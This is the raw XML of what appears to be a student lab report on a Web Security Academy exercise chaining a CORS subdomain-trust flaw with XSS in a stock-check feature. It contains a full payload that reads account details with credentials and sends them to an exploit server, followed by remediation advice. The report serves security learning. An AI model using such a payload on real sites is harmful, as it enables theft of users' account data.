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32904F36" w:rsidR="00821258" w:rsidRPr="00F10577" w:rsidRDefault="00F10577" w:rsidP="0077760B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application has an insecure CORS configuration in it which forces the application to </w:t>
      </w:r>
      <w:r w:rsidR="00925007" w:rsidRPr="00925007">
        <w:t>that it trusts all subdomains regardless of the protocol</w:t>
      </w:r>
      <w:r>
        <w:t>.</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0402A3F8"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w:t>
      </w:r>
      <w:r w:rsidR="00366E5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>subdomain</w:t>
      </w:r>
      <w:r w:rsidR="00F27F69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E0652">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>origins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7345E8" w14:textId="30FEB0D1"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r w:rsidR="008F594F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the input field is vulnerable to XSS attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142FAA2" w14:textId="3D017768" w:rsidR="00A630A0" w:rsidRDefault="00A630A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Upon investigating we see that </w:t>
      </w:r>
      <w:r w:rsidR="00A912A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">the stock check functionality of the products </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A912A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A912A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable to XSS attack.</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79E9606D" w14:textId="060C24D7" w:rsidR="00C91309" w:rsidRPr="00C91309" w:rsidRDefault="00821258" w:rsidP="00C91309">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4A8B777A" w14:textId="3069636C" w:rsidR="004D4B30" w:rsidRDefault="00C91309" w:rsidP="00C91309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Origin: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00735DD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>http://subdomain.0a3a003f0447826980e421de003d0046.web-security-academy.net/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BF6C7D0" w14:textId="77777777" w:rsidR="00C91309" w:rsidRPr="00C91309" w:rsidRDefault="00C91309" w:rsidP="00C91309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655C30B4" w14:textId="77777777" w:rsidR="00C91309" w:rsidRPr="00C91309" w:rsidRDefault="00C91309" w:rsidP="00C91309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4&lt;script&gt;var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>req</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>req.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>reqListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>req.withCredentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>true;req.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">();function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>reqListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>storeId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A70BFA2" w14:textId="1CC567CC" w:rsidR="00C91309" w:rsidRDefault="00C91309" w:rsidP="00C91309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB82E0" w14:textId="1AEE0D72" w:rsidR="00821258" w:rsidRDefault="00821258" w:rsidP="00F11B94">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="405A0892" w14:textId="1968AA19" w:rsidR="00F11B94" w:rsidRDefault="00F11B94" w:rsidP="00F11B94">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EFA3C" w14:textId="63ED36AC" w:rsidR="00F11B94" w:rsidRDefault="001F45E0" w:rsidP="00F11B94">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E5755A1" wp14:editId="177CBF9B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>408940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6645910" cy="1089025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1467342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42531" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1089025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5DBC58" w14:textId="374FA582" w:rsidR="00F11B94" w:rsidRDefault="001F45E0" w:rsidP="00F11B94">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44569568" wp14:editId="058D34D6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1612265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6645910" cy="1129030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="9321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0883" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1129030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759BA12" w14:textId="0937A8B4" w:rsidR="001F45E0" w:rsidRDefault="001F45E0" w:rsidP="00F11B94">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED8ABC7" w14:textId="14A6851D"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B2BF5CA" w14:textId="77777777" w:rsidR="001C55CA" w:rsidRDefault="001C55CA" w:rsidP="001C55CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C55CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Specific CORS Configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C55CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Refine the application's CORS settings. While trusting subdomains might be required for certain operations, it's essential to ensure that only the specific subdomains necessary for the application's operations are trusted. Additionally, ensure that the trusted domains use the appropriate protocol (e.g., https).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC07CC" w14:textId="2DC50A61" w:rsidR="001C55CA" w:rsidRPr="001C55CA" w:rsidRDefault="001C55CA" w:rsidP="001C55CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C55CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implement Origin Header Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C55CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Establish server-side logic that rigorously validates the Origin header against a whitelist of allowed origins. If the origin isn't on the whitelist, don't return the CORS-specific headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C9EC6" w14:textId="162B2F8A" w:rsidR="00645DB1" w:rsidRPr="001C55CA" w:rsidRDefault="001C55CA" w:rsidP="001C55CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C55CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Mitigate XSS Vulnerabilities:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C55CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Address and fix all XSS vulnerabilities in the application. This includes properly validating, sanitizing, and encoding user inputs, especially in the stock check functionality. Consider utilizing Content Security Policy (CSP) to prevent the execution of inline scripts, adding an additional layer against XSS attacks.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00645DB1" w:rsidRPr="001C55CA"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B13BD9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95BE3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1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2005820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54454"/>
    <w:rsid w:val="00061867"/>
    <w:rsid w:val="000E0652"/>
    <w:rsid w:val="001C55CA"/>
    <w:rsid w:val="001D5FBD"/>
    <w:rsid w:val="001F45E0"/>
    <w:rsid w:val="00261147"/>
    <w:rsid w:val="002F2030"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003606DC"/>
    <w:rsid w:val="00366E5F"/>
    <w:rsid w:val="00416927"/>
    <w:rsid w:val="004D4B30"/>
    <w:rsid w:val="004F2D48"/>
    <w:rsid w:val="00566E4F"/>
    <w:rsid w:val="00645DB1"/>
    <w:rsid w:val="0077760B"/>
    <w:rsid w:val="007B6F3D"/>
    <w:rsid w:val="00821258"/>
    <w:rsid w:val="008F594F"/>
    <w:rsid w:val="00925007"/>
    <w:rsid w:val="009D2559"/>
    <w:rsid w:val="00A02736"/>
    <w:rsid w:val="00A24E66"/>
    <w:rsid w:val="00A630A0"/>
    <w:rsid w:val="00A912A1"/>
    <w:rsid w:val="00BC753C"/>
    <w:rsid w:val="00C91309"/>
    <w:rsid w:val="00C92793"/>
    <w:rsid w:val="00DA161C"/>
    <w:rsid w:val="00E2662F"/>
    <w:rsid w:val="00EA0204"/>
    <w:rsid w:val="00F10577"/>
    <w:rsid w:val="00F11B94"/>
    <w:rsid w:val="00F2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 w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C91309"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C91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bdomain.0a3a003f0447826980e421de003d0046.web-security-academy.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16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-20T06:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T09:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>